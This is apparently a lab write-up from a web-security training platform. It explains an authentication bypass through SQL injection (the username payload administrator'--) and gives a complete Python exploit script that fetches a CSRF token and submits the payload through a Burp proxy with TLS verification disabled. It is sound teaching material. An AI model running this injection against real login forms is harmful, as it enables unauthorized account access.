This lab showed how a basic SQL injection vulnerability in a login form can be used to bypass authentication. By injecting a crafted input into the username field, I was able to manipulate the backend SQL query and log in as the administrator user — without knowing the password. It was a powerful reminder of how dangerous it is to construct SQL queries directly from user input; the fix is to pass user input only as bound parameters of a prepared statement, never by concatenating it into the query text.
[+] Start Burp Suite before running the script — it uses a proxy for visibility.
[+] The login form input is vulnerable to SQL injection.
[+] A crafted username like administrator'-- bypasses password validation: the single quote closes the username string literal and the -- turns the rest of the query, including the password comparison, into a comment.
[+] The server logs you in as administrator without needing the correct password.
[+] CSRF token is fetched dynamically to submit a valid request.
[+] Login success is inferred from the absence of the "Invalid username or password." message in the response. This is a negative check, so any response without that text (including a server error) would also be reported as success.
python3 exploit.py https://<your-lab-id>.web-security-academy.net
import requests
import sys
import urllib3
from bs4 import BeautifulSoup
# Silence the InsecureRequestWarning that each verify=False request below would
# otherwise print. This only hides the warning; TLS validation stays disabled.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Send both HTTP and HTTPS traffic through Burp Suite's default listener so every
# request/response can be inspected. Burp must already be running (see the note
# at the top); presumably requests fail to connect otherwise.
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
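def get_csrf_token(s, url):
    """Fetch the login page and return the value of its ``csrf`` hidden input.

    Args:
        s: The ``requests.Session`` shared with the login POST, so cookies set
           while fetching the form accompany the request that uses the token.
        url: Lab base URL including scheme, e.g.
            ``https://<your-lab-id>.web-security-academy.net``.

    Returns:
        The CSRF token string from ``<input name="csrf" value="...">``.

    Raises:
        requests.HTTPError: if ``/login`` is not served with a success status.
        RuntimeError: if the page has no ``csrf`` input or it has no value.
    """
    uri = "/login"
    # verify=False disables certificate validation and the traffic goes through
    # the Burp proxy; both are lab conveniences, not something to reuse elsewhere.
    r = s.get(url + uri, verify=False, proxies=proxies)
    r.raise_for_status()
    soup = BeautifulSoup(r.text, 'html.parser')
    # Look the field up by name. The original took the first <input> on the page,
    # which silently returns the wrong field (or crashes with a TypeError/KeyError)
    # if the form layout is not exactly as assumed.
    field = soup.find("input", {"name": "csrf"})
    if field is None or not field.get("value"):
        raise RuntimeError("CSRF token not found on /login page")
    return field["value"]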
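def exploit_sqli(s, url, payload):
    """Submit the injection payload through the login form and report the outcome.

    Args:
        s: The ``requests.Session`` also used by ``get_csrf_token``.
        url: Lab base URL including scheme.
        payload: Username value to inject. It is sent as the password too; the
            value there is irrelevant once the injected ``--`` comments out the
            password check.

    Returns:
        True when the POST (after any redirects) completed with a non-error
        status and the response does not contain
        ``"Invalid username or password."``; False otherwise.
    """
    csrf = get_csrf_token(s, url)
    data = {"csrf": csrf,
            "username": payload,
            "password": payload}
    uri = "/login"
    r = s.post(url + uri, data=data, verify=False, proxies=proxies)
    # The original only tested for the error string, so a 4xx/5xx response
    # (e.g. a rejected CSRF token) that carries no such text was reported as a
    # successful login. Require a success status before trusting the negative check.
    if not r.ok:
        return False
    return "Invalid username or password." not in r.text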
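if __name__ == "__main__":
    try:
        # Drop a trailing slash so url + "/login" does not become ".../​/login".
        url = sys.argv[1].strip().rstrip("/")
    except IndexError:
        print("[-] Usage: %s <url>" % sys.argv[0])
        # The example must include the scheme: requests cannot send to a bare host.
        print('[-] Example: %s https://<your-lab-id>.web-security-academy.net' % sys.argv[0])
        # Stop here; the original fell through and then failed with a NameError on url.
        sys.exit(1)
    # The quote closes the username literal and "--" comments out the remainder
    # of the query, including the password comparison.
    sqli_payload = "administrator'--"
    s = requests.Session()
    if exploit_sqli(s, url, sqli_payload):
        print("[+] SQL injection successful! We have logged in as the administrator user.")
    else:
        print("[-] SQL injection unsuccessful.")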